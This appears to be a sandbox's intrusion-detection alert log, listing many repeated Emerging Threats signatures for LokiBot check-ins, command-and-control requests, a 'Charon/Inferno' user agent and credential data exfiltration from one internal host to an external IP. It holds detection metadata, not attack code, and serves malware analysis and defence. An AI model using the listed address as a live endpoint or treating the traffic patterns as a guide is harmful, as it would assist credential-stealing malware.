Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:56.609631
SID:	2825766
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.151380
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:39.111241
SID:	2025381
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:47.687505
SID:	2024313
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.151380
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:07.360242
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.265047
SID:	2021641
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:59.640455
SID:	2021641
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:38.407237
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:47.687505
SID:	2024318
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:48.379699
SID:	2825766
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:18.685116
SID:	2024318
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:31.437871
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:11.400710
SID:	2025381
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:19.372255
SID:	2825766
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.764699
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.126318
SID:	2024318
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.873778
SID:	2825766
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.126318
SID:	2024313
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:18.685116
SID:	2024313
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:24.221116
SID:	2024317
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.850228
SID:	2825766
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.009985
SID:	2825766
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:24.221116
SID:	2024312
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:44.645218
SID:	2025381
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.958519
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.921190
SID:	2024313
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:31.366751
SID:	2024318
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.278543
SID:	2021641
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:31.366751
SID:	2024313
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.243601
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.947017
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.855566
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.921190
SID:	2024318
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.958519
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.947017
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:26.534492
SID:	2825766
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:37.702889
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:35.672062
SID:	2021641
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.036535
SID:	2025381
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:53.324729
SID:	2024318
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.030663
SID:	2825766
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.982502
SID:	2024313
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:53.324729
SID:	2024313
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.982502
SID:	2024318
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:29.787077
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.210551
SID:	2825766
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.810149
SID:	2825766
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.108965
SID:	2025381
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.791207
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:06.650555
SID:	2021641
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.890742
SID:	2024318
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:30.613047
SID:	2825766
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.972593
SID:	2025381
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.844436
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.844436
SID:	2024318
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.890742
SID:	2024313
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:29.787077
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:02.546391
SID:	2825766
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.856471
SID:	2025381
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.873778
SID:	2024318
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:31.366751
SID:	2825766
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:50.437190
SID:	2025381
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.911562
SID:	2024313
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:08.198877
SID:	2024318
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.938500
SID:	2021641
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.151380
SID:	2825766
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:53.324729
SID:	2825766
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.813478
SID:	2021641
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.152524
SID:	2825766
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.911562
SID:	2024318
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.126318
SID:	2825766
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.873778
SID:	2024313
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:02.546391
SID:	2021641
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:13.658001
SID:	2021641
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:40.804238
SID:	2825766
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:08.198877
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:46.959263
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:16.574818
SID:	2825766
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.748494
SID:	2025381
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:40.804238
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:03.254673
SID:	2021641
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:46.959263
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.938500
SID:	2825766
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:34.610079
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.015339
SID:	2025381
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:28.593679
SID:	2024313
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.732709
SID:	2825766
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.952090
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.043826
SID:	2024318
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:28.593679
SID:	2024318
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.282252
SID:	2025381
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.043826
SID:	2024313
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.796602
SID:	2825766
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:48.379699
SID:	2024313
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:30.613047
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:40.106892
SID:	2024318
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.125041
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.093731
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:36.358340
SID:	2025381
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.093731
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.732709
SID:	2021641
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.813478
SID:	2825766
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:47.778229
SID:	2825766
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.987306
SID:	2025381
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.042243
SID:	2825766
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:27.224947
SID:	2021641
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:42.314099
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.987496
SID:	2025381
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:52.638175
SID:	2024318
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:35.452745
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.269664
SID:	2025381
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:30.613047
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:35.452745
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.122189
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

